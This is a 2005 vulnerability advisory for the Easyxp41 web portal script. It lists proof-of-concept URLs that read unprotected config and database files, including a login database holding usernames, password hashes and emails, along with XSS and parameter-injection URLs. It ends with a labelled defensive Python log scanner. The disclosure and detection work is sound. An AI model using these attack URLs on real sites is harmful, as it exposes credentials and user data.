XSS flaws and data disclosure in Easyxp41, Easyxp41 contains flaws enabling data disclosure and XSS attacks, no solution available, discovered on 26-07-2005
XSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data disclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/xss-flaws-and-data-disclosure-in.html
vendor notified: Yes
exploit available: Yes
##################################################
Easyxp41 is a free script for building a web portal and is very easy to run.
Easyxp41 contains a flaw that lets files be opened directly, so their
contents can be read.
###########
Versions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notified: 29-07-2005
Disclosure: 29-07-2005
############
Proof of concepts
############
################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
The Forum variable is badly defined; combined with the flaw above in
modules/forum/msg, the forum messages can be read without being
authenticated in PHP:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
Disclosure of the names of the .dat files that contain the forum messages:
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure:
http://[victim]/modules/login/db/login.db
##########################
User email disclosure: modules/login/db/login.db
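As a defender-side complement to the proof of concepts above, the following added example (not part of the original advisory) scans Apache combined-format access logs for the three patterns the advisory describes: direct reads of the exposed cfg/db/msg/admin locations, a pg parameter that loads an external URL (the iframe case), and script markup in parameters such as membres or Forum. The log lines are constructed samples, and the rule set is this example's own, not the vendor's.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Jul/2005:10:01:02 +0200] "GET /index.php?pg=modules/news/ HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jul/2005:10:01:09 +0200] "GET /modules/login/db/login.db HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jul/2005:10:01:15 +0200] "GET /index.php?pg=http://example.org/&pgtype=iframe&L=500&H=500 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jul/2005:10:01:21 +0200] "GET /index.php?pg=modules/forum/viewprofil.php&membres=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Jul/2005:10:02:00 +0200] "GET /index.php?pg=modules/forum/viewtopic.php&Forum=General&msg=1103495330.dat&pgfull HTTP/1.1" 200 2400 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Files and folders the advisory lists as directly readable: cfg/, db/, msg/ dumps and admin pages.
SENSITIVE_PATH = re.compile(
    r"^/(cfg/|mesdocuments/|modules/(forum|login)/(db|cfg|msg|admin)(/|$)|modules/forum/.*\.dat$)"
)
MARKUP = re.compile(r"<[^>]+>|javascript:", re.IGNORECASE)


def inspect_request(target):
    """Return the advisory-specific warning signs found in one request target."""
    findings = []
    parts = urlsplit(target)
    if SENSITIVE_PATH.match(parts.path):
        findings.append("direct read of exposed file or folder")
    params = parse_qs(parts.query, keep_blank_values=True)
    for pg in params.get("pg", []):
        # pg should name a local module; an absolute URL means a foreign page is loaded into the site.
        if re.match(r"^(https?:)?//", pg, re.IGNORECASE):
            kind = "iframe" if "iframe" in params.get("pgtype", []) else "page"
            findings.append(f"external URL loaded via pg ({kind})")
    for name, values in params.items():
        if any(MARKUP.search(v) for v in values):
            findings.append(f"script markup in parameter {name}")
    return findings


def scan_log(text):
    """Parse combined-format lines and keep only the requests that trip a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        findings = inspect_request(target)
        if findings:
            hits.append((ip, target, findings))
    return hits
```

Until a vendor fix exists, the same path rule can be turned into a web-server deny rule for the db, cfg and msg folders, which removes the disclosure even where the application itself is unchanged.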
############################# End ##########################
Thanks to Lostmon for support ([email protected]) http://lostmon.blogspot.com/
--
Sincerely,
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com